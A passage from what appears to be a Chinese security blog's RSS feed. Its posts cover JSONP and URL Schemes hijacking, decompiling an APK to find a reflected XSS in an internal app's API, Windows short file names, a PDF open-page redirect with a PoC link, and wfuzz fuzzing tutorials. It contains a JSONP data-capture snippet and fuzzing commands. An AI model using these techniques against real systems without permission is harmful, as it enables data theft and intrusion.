&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;script&amp;gt;function test(data){ document.write(JSON.stringify(data)) }&amp;lt;/script&amp;gt; &amp;lt;script src=&quot;JSONP URL&quot;&amp;gt;&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;h2 id=&quot;url-schemes劫持&quot;&gt;URL Schemes劫持&lt;/h2&gt;

&lt;p&gt;这个漏洞是15年在乌云爆出来的，漏洞编号为：wooyun-2015-0103233，大家可以自行去查看。&lt;/p&gt;

&lt;p&gt;这个问题说白了是一个流程上的缺陷，苹果官方没有限制APP定义的URL Schemes名字，导致其他APP也可以定义“支付宝”的URL Schems名字；又因为iOS系统判定URL Schemes优先级顺序与 Bundle ID 有关（一个 Bundle ID 对应一个应用），如果有人精心伪造 Bundle ID，iOS 就会调用恶意 App 的 URL Schemes 去接收相应的 URL Schemes 请求，这就导致了可以被劫持。&lt;/p&gt;

&lt;h1 id=&quot;结尾&quot;&gt;结尾&lt;/h1&gt;

&lt;p&gt;还有很多思路等着我们去探寻，此文仅做思路启发。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reference:&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;https://sspai.com/post/31500&lt;/p&gt;

  &lt;p&gt;https://sspai.com/post/44591&lt;/p&gt;

  &lt;p&gt;WooyunBugID:wooyun-2015-0103233&lt;/p&gt;
&lt;/blockquote&gt;
</description>
          <pubDate>2018-12-08T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2018-12-08/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2018-12-08/1</guid>
        </item>
      
    
      
        <item>
          <title>打造Mac下APK逆向环境到实战接口XSS挖掘</title>
          <description>&lt;h1 id=&quot;前言&quot;&gt;前言&lt;/h1&gt;

&lt;p&gt;想尝试逆向APK来发现一些接口和安全问题，但是Mac下没啥好用的APK逆向工具，于是我就参考文章：https://blog.csdn.net/jyygn163/article/details/71731786 的思路在Mac下使用homebrew安装：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;brew install apktool
brew install dex2jar
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;JD-GUI去http://jd.benow.ca/下载，这里我是用的是jar版。&lt;/p&gt;

&lt;h1 id=&quot;过程&quot;&gt;过程&lt;/h1&gt;

&lt;h2 id=&quot;自动化编译&quot;&gt;自动化编译&lt;/h2&gt;

&lt;p&gt;手动敲命令太繁琐了，写个shell脚本一键化。&lt;/p&gt;

&lt;p&gt;在&lt;code&gt;.bash_profile&lt;/code&gt;文件（环境变量）加入这个命令&lt;code&gt;alias apkdec=&quot;/Users/chen/HackBox/Tools/Android\ Decompile/DeApkScript.sh&quot;&lt;/code&gt;，这样当终端打开的时候就可以使用&lt;code&gt;apkdec&lt;/code&gt;命令了，而脚本&lt;code&gt;DeApkScript.sh&lt;/code&gt;的内容如下：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;apktool d $1 &amp;amp;&amp;amp; mv $1 $1.zip &amp;amp;&amp;amp; unzip $1.zip &quot;*.dex&quot; -d $1_dex/ &amp;amp;&amp;amp; cd $1_dex/ &amp;amp;&amp;amp; d2j-dex2jar *.dex 
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;功能实现如下：&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;apktool获取资源文件&lt;/li&gt;
  &lt;li&gt;将apk文件重命名为zip文件&lt;/li&gt;
  &lt;li&gt;解压zip文件中的.dex文件&lt;/li&gt;
  &lt;li&gt;切换解压目录&lt;/li&gt;
  &lt;li&gt;将dex文件转换成jar文件&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;这样，最后只需要使用JD-GUI反编译JAR即可看见源码了。&lt;/p&gt;

&lt;h2 id=&quot;实战&quot;&gt;实战&lt;/h2&gt;

&lt;p&gt;运行命令：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;apkdec xxx.apk
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-11-18/0.png&quot; alt=&quot;apkdec&quot; /&gt;&lt;/p&gt;

&lt;p&gt;首先对&lt;code&gt;classes-dex2jar.jar&lt;/code&gt;文件进反编译，但似乎在Mac下JD-GUI支持的不太好，所以我选择使用luyten（Download：https://github.com/deathmarine/Luyten/releases），如下是两张对比图：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-11-18/1.png&quot; alt=&quot;apkdec&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;漏洞挖掘&quot;&gt;漏洞挖掘&lt;/h2&gt;

&lt;p&gt;在luyten下使用Command+G快捷键全局搜索，搜索域名寻找接口（因为这个APP需要内部人员才能登录所以从正常的入口是无法找到接口进行漏洞挖掘的）&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-11-18/2.png&quot; alt=&quot;search&quot; /&gt;&lt;/p&gt;

&lt;p&gt;寻找了一番看见这样一个接口：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-11-18/3.png&quot; alt=&quot;api&quot; /&gt;&lt;/p&gt;

&lt;p&gt;二话不说访问之，提示：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{&quot;res_code&quot;:&quot;-1008003&quot;,&quot;res_message&quot;:&quot;参数错误&quot;,&quot;timeMillis&quot;:1542516229723}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;不懂Java的我一脸懵，但是天下语言都是互通的，大概的了解了代码的意思（可能理解的不到位，就不说出来误导了），于是找到这样一个函数：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-11-18/4.png&quot; alt=&quot;function&quot; /&gt;&lt;/p&gt;

&lt;p&gt;从我的理解来看这个接口就是有这两个参数&lt;code&gt;appId、userName&lt;/code&gt;，于是加入GET请求参数中请求：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;Request:
?appId=123&amp;amp;userName=123
Response:
{&quot;res_code&quot;:&quot;0&quot;,&quot;res_message&quot;:&quot;成功&quot;,&quot;timeMillis&quot;:1542516495613,&quot;extData&quot;:null,&quot;data&quot;:[{&quot;appId&quot;:&quot;123&quot;,&quot;permissionTag&quot;:[&quot;&quot;],&quot;extData&quot;:null}]}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;其中appId的参数值返回在了页面中，该请求响应报文&lt;code&gt;Content-Type: text/html&lt;/code&gt;，所以尝试构建XSS，运气好，确实也存在XSS问题：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-11-18/5.png&quot; alt=&quot;alert&quot; /&gt;&lt;/p&gt;

&lt;h1 id=&quot;总结&quot;&gt;总结&lt;/h1&gt;

&lt;p&gt;学习、不断的学习。&lt;/p&gt;
</description>
          <pubDate>2018-11-18T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2018-11-18/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2018-11-18/1</guid>
        </item>
      
    
      
        <item>
          <title>一探短文件名</title>
          <description>&lt;h1 id=&quot;短文件名&quot;&gt;短文件名&lt;/h1&gt;

&lt;p&gt;最近看见一些漏洞利用到了短文件名回想到之前发现的漏洞，发现自己对短文件名的原理一无所知，现在来一探究竟。&lt;/p&gt;

&lt;h2 id=&quot;什么是短文件名&quot;&gt;什么是短文件名&lt;/h2&gt;

&lt;blockquote&gt;
  &lt;p&gt;windows下的文件短名是dos+fat12/fat16时代的产物，又称为8dot3命名法，类似于PROGRA~1（目录）或者元素周~1.exe（文件）这样的名称。
8是指文件名或目录名的主体部分小于等于8个字符 ;  3是指文件名或目录名的扩展部分小于等于3个字符 ;中间以 &lt;code&gt;.&lt;/code&gt; 作为分割在FAT16文件系统中，由于FDT中的文件目录登记项只为文件名保留了8个字节，为扩展名保留了3个字节，所以DOS和Windows的用户为文件起名字时要受到8.3格式的限制。&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;查看Windows下的短文件名：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-11-14/0.png&quot; alt=&quot;windows&quot; /&gt;&lt;/p&gt;

&lt;p&gt;可以看见图中的&lt;code&gt;123123~1.TXT&lt;/code&gt;，就是&lt;code&gt;1231231231231231232.txt&lt;/code&gt;的短文件名表示。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;为什么现在Windows系统还存在短文件名这种表示？&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;从win95开始，采用fat32已经支持长文件名，但是为了保持兼容性，保证低版本的程序能正确读取长文件名文件，每当创建新文件或新目录时，系统自动为所有长文件名文件创建了一个对应的短文件名。使这个文件既可以用长文件名寻址，也可以用短文件名寻址。&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2 id=&quot;短文件名命名方式&quot;&gt;短文件名命名方式&lt;/h2&gt;

&lt;p&gt;知道了什么是短文件名，再看如上文所贴图，图中文件&lt;code&gt;1231231231231231232.txt&lt;/code&gt;的短文件名就是&lt;code&gt;123123~1.TXT&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Windows短文件名8dot3命名规则&lt;/strong&gt;：&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;符合DOS短文件名规则的Windows下的长文件名不变&lt;/li&gt;
  &lt;li&gt;长文件名中的空格，在短文件名中被删除&lt;/li&gt;
  &lt;li&gt;删除空格后的长文件名，若长度大于8个字符，则取前6个字符，后两个字符以&lt;code&gt;~#&lt;/code&gt;代替，其中 &lt;strong&gt;#&lt;/strong&gt; 为数字，数字根据前六个字符相同的文件名的个数顺延。若个数超过10个则取前5个字符，后三个字符以&lt;code&gt;~##&lt;/code&gt;代替，其中 &lt;strong&gt;##&lt;/strong&gt; 为两位数字，若个数大于100也依此规则替换。&lt;/li&gt;
  &lt;li&gt;对使用多个&lt;code&gt;.&lt;/code&gt;隔开的长文件名，取最左端一段转换为短文件名，取最右一段前三个字符为扩展名&lt;/li&gt;
  &lt;li&gt;如果存在老 OS 或程序无法读取的字符，用&lt;code&gt;_&lt;/code&gt;替换&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-11-14/1.png&quot; alt=&quot;windows&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;关闭短文件名&quot;&gt;关闭短文件名&lt;/h2&gt;

&lt;p&gt;将Windows注册表（&lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem&lt;/code&gt;）中的&lt;code&gt;NtfsDisable8dot3NameCreation&lt;/code&gt;这一项的值设为 1&lt;/p&gt;

&lt;p&gt;CMD实现关闭短文件名：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-cmd&quot;&gt;reg add &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem&quot; /v NtfsDisable8dot3NameCreation /d 1 /t REG_DWORD /f
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;如果想开启（将值设为0）：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-cmd&quot;&gt;reg add &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem&quot; /v NtfsDisable8dot3NameCreation /d 0 /t REG_DWORD /f
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;strong&gt;需要注意&lt;/strong&gt;：即使关闭了短文件名功能，也不会删除原有创建过的短文件名&lt;/p&gt;
</description>
          <pubDate>2018-11-14T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2018-11-14/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2018-11-14/1</guid>
        </item>
      
    
      
        <item>
          <title>浅析PDF事件导致的安全漏洞</title>
          <description>&lt;h1 id=&quot;浅析pdf事件导致的安全漏洞&quot;&gt;浅析PDF事件导致的安全漏洞&lt;/h1&gt;

&lt;p&gt;最近ASRC的事情（&lt;strong&gt;PDF导致的URL跳转漏洞&lt;/strong&gt;）闹的沸沸扬扬的，一开始没怎么去关注，后来想去玩一玩的时候发现作者没有给出比较好的说明来告诉大家如何玩、操作PDF的事件和漏洞原理。小白的我来探究一下。。&lt;/p&gt;

&lt;h2 id=&quot;pdf事件添加&quot;&gt;PDF事件添加&lt;/h2&gt;

&lt;p&gt;本人是macOS系统所以用不了迅捷PDF编辑器，后来尝试寻找各种适用于Mac平台的编辑器无果之后，还是向Adobe妥协，下载了&lt;strong&gt;破解版的Adobe Acrobat Pro DC 2018(也支持Windows)&lt;/strong&gt;。&lt;/p&gt;

&lt;p&gt;随便用Word文档导出了一个PDF，使用Acrobat打开，进行编辑，找了一会终于找到了页面属性设置的地方。&lt;/p&gt;

&lt;p&gt;点击右侧的组织页面功能：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-11-14-2/0.png&quot; alt=&quot;pdf&quot; /&gt;&lt;/p&gt;

&lt;p&gt;选择这一页点击更多-&amp;gt;页面属性：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-11-14-2/1.png&quot; alt=&quot;pdf&quot; /&gt;&lt;/p&gt;

&lt;p&gt;选择事件动作-&amp;gt;触发器选择&lt;strong&gt;打开页面&lt;/strong&gt;-&amp;gt;选择动作&lt;strong&gt;打开网络链接&lt;/strong&gt;-&amp;gt;添加 输入地址：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-11-14-2/2.png&quot; alt=&quot;pdf&quot; /&gt;&lt;/p&gt;

&lt;p&gt;设置成功：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-11-14-2/3.png&quot; alt=&quot;pdf&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;漏洞测试&quot;&gt;漏洞测试&lt;/h2&gt;

&lt;p&gt;漏洞测试浏览器：谷歌浏览器 Chrome&lt;/p&gt;

&lt;p&gt;漏洞测试GIF：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-11-14-2/4.gif&quot; alt=&quot;test&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;why&quot;&gt;Why？&lt;/h2&gt;

&lt;p&gt;这个漏洞的局限性在于浏览器的不同，那么为什么会只存在于部分浏览器上呢？&lt;/p&gt;

&lt;h3 id=&quot;内核&quot;&gt;内核？&lt;/h3&gt;

&lt;p&gt;一开始的猜想是与浏览器的内核有关，Chrome是基于Webkit的内核分支，而Safari也是基于这个的，但是经过测试发现发现Safari无法跳转。&lt;/p&gt;

&lt;p&gt;结果：NO&lt;/p&gt;

&lt;h3 id=&quot;插件&quot;&gt;插件？&lt;/h3&gt;

&lt;p&gt;之前了解过FireFox浏览器是使用pdf预览插件是Chrome的PDF Viewer，但是至今为止最新版都只是很久以前的版本了（火狐官方也进行了一些细微的修改）：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-11-14-2/5.png&quot; alt=&quot;plugin&quot; /&gt;&lt;/p&gt;

&lt;p&gt;谷歌自己呢早就更新迭代了：&lt;/p&gt;

&lt;p&gt;&lt;code&gt;chrome-extension://mhjfbmdgcfjbbpaeojofohoefgiehjai/pdf_viewer.js&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-11-14-2/6.png&quot; alt=&quot;plugin&quot; /&gt;&lt;/p&gt;

&lt;p&gt;结果：很大概率和浏览器PDF预览插件有关，可能是谷歌在之后更新引入了对PDF事件的支持。&lt;/p&gt;

&lt;h1 id=&quot;end&quot;&gt;END&lt;/h1&gt;

&lt;p&gt;PoC下载：&lt;a href=&quot;https://gh0st.cn/file/poc.pdf&quot;&gt;PoC.pdf&lt;/a&gt;&lt;/p&gt;
</description>
          <pubDate>2018-11-14T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2018-11-14/2</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2018-11-14/2</guid>
        </item>
      
    
      
        <item>
          <title>Wfuzz高阶功法</title>
          <description>&lt;h1 id=&quot;wfuzz高阶功法&quot;&gt;Wfuzz高阶功法&lt;/h1&gt;

&lt;p&gt;Author: Vulkey_Chen&lt;/p&gt;

&lt;p&gt;Blog: gh0st.cn&lt;/p&gt;

&lt;h2 id=&quot;模块&quot;&gt;模块&lt;/h2&gt;

&lt;p&gt;之前两篇文章中已经记录过了payloads和printers模块，所以就不在这继续记录。&lt;/p&gt;

&lt;h3 id=&quot;iterators&quot;&gt;Iterators&lt;/h3&gt;

&lt;p&gt;BurpSuite的&lt;code&gt;Intruder&lt;/code&gt;模块中Attack Type有Sniper(狙击手)、Battering ram(撞击物)、Pitchfork(相交叉)、Cluster bomb(集束炸弹)～&lt;/p&gt;

&lt;p&gt;wfuzz也可以完成这样的功能，将不同的字典的组合起来，那就是&lt;code&gt;Iterators&lt;/code&gt;模块。&lt;/p&gt;

&lt;p&gt;使用参数&lt;code&gt;-m 迭代器&lt;/code&gt;，wfuzz自带的迭代器有三个：&lt;code&gt;zip&lt;/code&gt;、&lt;code&gt;chain&lt;/code&gt;、&lt;code&gt;product&lt;/code&gt;，如果不指定迭代器，默认为&lt;code&gt;product&lt;/code&gt;迭代器。&lt;/p&gt;

&lt;h4 id=&quot;zip&quot;&gt;zip&lt;/h4&gt;

&lt;p&gt;命令：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -z range,0-9 -w dict.txt -m zip http://127.0.0.1/ip.php?FUZZ=FUZ2Z
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;结果如下：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-10-28/0x04.png&quot; alt=&quot;0x04&quot; /&gt;&lt;/p&gt;

&lt;p&gt;该命令的意思：设置了两个字典。两个占位符，一个是&lt;code&gt;range&lt;/code&gt;模块生成的&lt;code&gt;0、1、2、3、4、5、6、7、8、9 &lt;/code&gt; 10个数字，一个是外部字典dict.txt的9行字典，使用&lt;strong&gt;zip迭代器组合这两个字典&lt;/strong&gt;发送。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;zip迭代器的功能&lt;/strong&gt;：字典数相同、一一对应进行组合，&lt;strong&gt;如果字典数不一致则多余的抛弃掉不请求，如上命令结果就是数字9被抛弃了因为没有字典和它组合&lt;/strong&gt;。&lt;/p&gt;

&lt;h4 id=&quot;chain&quot;&gt;chain&lt;/h4&gt;

&lt;p&gt;命令：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -z range,0-9 -w dict.txt -m chain http://127.0.0.1/ip.php?FUZZ
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;结果如下：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-10-28/0x05.png&quot; alt=&quot;0x05&quot; /&gt;&lt;/p&gt;

&lt;p&gt;该命令设置了两个字典，一个占位符FUZZ，&lt;strong&gt;使用chain迭代器组合这两个字典&lt;/strong&gt;发送。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;chain迭代器的功能&lt;/strong&gt;：通过返回结果就能看出来&lt;code&gt;chain&lt;/code&gt;迭代器的功能了，&lt;strong&gt;这个迭代器是将所有字典全部整合（不做组合）放在一起然后传入占位符FUZZ&lt;/strong&gt;中。&lt;/p&gt;

&lt;h4 id=&quot;product&quot;&gt;product&lt;/h4&gt;

&lt;p&gt;命令：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -z range,0-2 -w dict.txt -m product http://127.0.0.1/ip.php?FUZZ=FUZ2Z
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;结果如下：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-10-28/0x06.png&quot; alt=&quot;0x06&quot; /&gt;&lt;/p&gt;

&lt;p&gt;该命令的意思：设置了两个字典，两个占位符，一个是&lt;code&gt;range&lt;/code&gt;模块生成的&lt;code&gt;0、1、2&lt;/code&gt; 3个数字，一个是外部字典dict.txt的3行字典，使用&lt;strong&gt;product迭代器组合这两个字典&lt;/strong&gt;发送。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;product迭代器的功能&lt;/strong&gt;：通过返回结果，知道了请求总数为9，请求的payload交叉组合：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-10-28/0x07.png&quot; alt=&quot;0x07&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;encoders&quot;&gt;Encoders&lt;/h3&gt;

&lt;p&gt;wfuzz中&lt;strong&gt;encoders模块&lt;/strong&gt;可以实现编码解码、加密，它支持如下图中所列转换功能：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-10-28/0x08.png&quot; alt=&quot;0x08&quot; /&gt;&lt;/p&gt;

&lt;h4 id=&quot;使用encoders&quot;&gt;使用Encoders&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;正常使用：&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;code&gt;wfuzz -z file --zP fn=wordlist,encoder=md5 URL/FUZZ&lt;/code&gt;&lt;/p&gt;

    &lt;p&gt;看过第一章的应该都能理解意思了，这里新增的就是&lt;code&gt;encoder=md5&lt;/code&gt;，也就是使用&lt;code&gt;Encoders&lt;/code&gt;的&lt;code&gt;md5&lt;/code&gt;加密。&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;code&gt;wfuzz -z file,wordlist,md5 URL/FUZZ&lt;/code&gt;&lt;/p&gt;

    &lt;p&gt;这里简写了第一条命令，一般都使用这条命令来调用Encoders&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;使用多个Encoder：&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;多个转换，使用一个&lt;code&gt;-&lt;/code&gt;号分隔的列表来指定&lt;/p&gt;

    &lt;p&gt;&lt;code&gt;wfuzz -z file,dict.txt,md5-base64 http://127.0.0.1/ip.php\?FUZZ&lt;/code&gt;&lt;/p&gt;

    &lt;p&gt;&lt;img src=&quot;/images/2018-10-28/0x09.png&quot; alt=&quot;0x09&quot; /&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;多次转换，使用一个&lt;code&gt;@&lt;/code&gt;号分隔的列表来按照&lt;strong&gt;从右往左顺序&lt;/strong&gt;多次转换（这里让传入的字典先md5加密然后base64编码）&lt;/p&gt;

    &lt;p&gt;&lt;code&gt;wfuzz -z file,dict.txt,base64@md5 http://127.0.0.1/ip.php\?FUZZ&lt;/code&gt;&lt;/p&gt;

    &lt;p&gt;&lt;img src=&quot;/images/2018-10-28/0x10.png&quot; alt=&quot;0x10&quot; /&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;h3 id=&quot;scripts&quot;&gt;Scripts&lt;/h3&gt;

&lt;p&gt;之前说了wfuzz支持插件，其本身也有很多插件，插件大部分都是实现扫描和解析功能，插件共有两大类和一类附加插件：&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;passive：分析已有的请求和响应（被动）&lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;active：会向目标发送请求来探测（主动）&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;discovery：自动帮助wfuzz对目标站进行爬取，将发现的内容提供给wfuzz进行请求&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Wfuzz默认自带脚本如下：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-10-28/0x11.png&quot; alt=&quot;0x11&quot; /&gt;&lt;/p&gt;

&lt;h4 id=&quot;使用scripts&quot;&gt;使用Scripts&lt;/h4&gt;

&lt;p&gt;我想使用&lt;code&gt;Scripts&lt;/code&gt;中的&lt;code&gt;backups&lt;/code&gt;模块，可以先试用&lt;code&gt;--script-help&lt;/code&gt;参数来看如何关于这个模块的信息：&lt;/p&gt;

&lt;p&gt;&lt;code&gt;wfuzz --script-help=robots&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-10-28/0x12.png&quot; alt=&quot;0x12&quot; /&gt;&lt;/p&gt;

&lt;p&gt;从如上结果中可以知道这个模块不需要设置参数，该模块解析robots.txt的并且寻找新的内容，，至于到底寻找什么，就需要动手实践下了～&lt;/p&gt;

&lt;p&gt;在本地建一个robots.txt：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-10-28/0x13.png&quot; alt=&quot;0x13&quot; /&gt;&lt;/p&gt;

&lt;p&gt;使用如下命令：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz --script=robots -z list,&quot;robots.txt&quot; http://127.0.0.1/FUZZ
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;code&gt;--script&lt;/code&gt;是使用脚本模块的参数，这时候就有个疑惑命令为什么要加上list呢？因为在这里&lt;code&gt;robots&lt;/code&gt;脚本只是解析&lt;code&gt;robots.txt&lt;/code&gt;规则的，所以你需要告诉wfuzz去请求哪个文件而这里我写的就是&lt;code&gt;robots.txt&lt;/code&gt;就可以解析（假设 http://127.0.0.1/t.txt 的内容也是robots的就可以写成这样的命令&lt;code&gt;wfuzz --script=robots -z list,&quot;t.txt&quot; http://127.0.0.1/FUZZ&lt;/code&gt; ）&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-10-28/0x14.png&quot; alt=&quot;0x14&quot; /&gt;&lt;/p&gt;

&lt;p&gt;从如上图中得知wfuzz解析robots.txt的内容然后请求解析之后获得的路径。&lt;/p&gt;

&lt;h4 id=&quot;自定义插件&quot;&gt;自定义插件&lt;/h4&gt;

&lt;p&gt;使用wfuzz可以自己编写wfuzz插件，需要放在&lt;code&gt;~/.wfuzz/scripts/&lt;/code&gt;目录下，具体如何编写可以参考已有的插件：https://github.com/xmendez/wfuzz/tree/master/src/wfuzz/plugins/scripts&lt;/p&gt;

&lt;h2 id=&quot;技巧&quot;&gt;技巧&lt;/h2&gt;

&lt;h3 id=&quot;recipes&quot;&gt;Recipes&lt;/h3&gt;

&lt;p&gt;Wfuzz可以生成一个recipes用来保存命令，方便下次执行或者分享给别人。&lt;/p&gt;

&lt;p&gt;生成一个recipes：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz --script=robots -z list,&quot;robots.txt&quot; --dumo-recipe outrecipe URL/FUZZ
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;使用某个recipes：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz --recip outrecipe
&lt;/code&gt;&lt;/pre&gt;

&lt;h3 id=&quot;网络异常&quot;&gt;网络异常&lt;/h3&gt;

&lt;p&gt;Wfuzz扫描的时候出现网络问题，如DNS解析失败，拒绝连接等时，wfuzz会抛出一个异常并停止执行使用&lt;code&gt;-Z&lt;/code&gt;参数即可忽略这些错误继续执行。&lt;/p&gt;

&lt;p&gt;出现错误的payload会以返回码&lt;code&gt;XXX&lt;/code&gt;来表示，&lt;strong&gt;Payload中还有出现的错误信息&lt;/strong&gt;。&lt;/p&gt;

&lt;h3 id=&quot;超时&quot;&gt;超时&lt;/h3&gt;

&lt;p&gt;使用wfuzz扫描会遇到一些响应很慢的情况，wfuzz可以设置超时时间。&lt;/p&gt;

&lt;p&gt;参数&lt;code&gt;--conn-delay&lt;/code&gt;来设置wfuzz等待服务器响应接连的秒数。
参数&lt;code&gt;--req-delay&lt;/code&gt;来设置wfuzz等待响应完成的最大秒数。&lt;/p&gt;

&lt;h3 id=&quot;结合burpsuite&quot;&gt;结合BurpSuite&lt;/h3&gt;

&lt;p&gt;从Burp的LOG文件中获取测试的URL地址：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-10-28/0x15.png&quot; alt=&quot;0x15&quot; /&gt;&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -z burplog,&quot;1.burp&quot; FUZZ
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-10-28/0x16.png&quot; alt=&quot;0x16&quot; /&gt;&lt;/p&gt;

&lt;p&gt;还有能够读取burpsuite保存的state：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -z burpstate,a_burp_state.burp FUZZ
&lt;/code&gt;&lt;/pre&gt;

&lt;h3 id=&quot;过滤器&quot;&gt;过滤器&lt;/h3&gt;

&lt;p&gt;这里篇幅太长，建议综合参考 https://github.com/xmendez/wfuzz/blob/18a83606e3011159b4b2e8c0064f95044c3c4af5/docs/user/advanced.rst 就不一一写出来了。&lt;/p&gt;
</description>
          <pubDate>2018-10-28T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2018-10-28/3</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2018-10-28/3</guid>
        </item>
      
    
      
        <item>
          <title>Wfuzz基本功</title>
          <description>&lt;h1 id=&quot;wfuzz基本功&quot;&gt;Wfuzz基本功&lt;/h1&gt;

&lt;p&gt;Author: Vulkey_Chen&lt;/p&gt;

&lt;p&gt;Blog: gh0st.cn&lt;/p&gt;

&lt;h2 id=&quot;爆破文件目录&quot;&gt;爆破文件、目录&lt;/h2&gt;

&lt;p&gt;wfuzz本身自带字典：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;.
├── Injections
│   ├── All_attack.txt
│   ├── SQL.txt
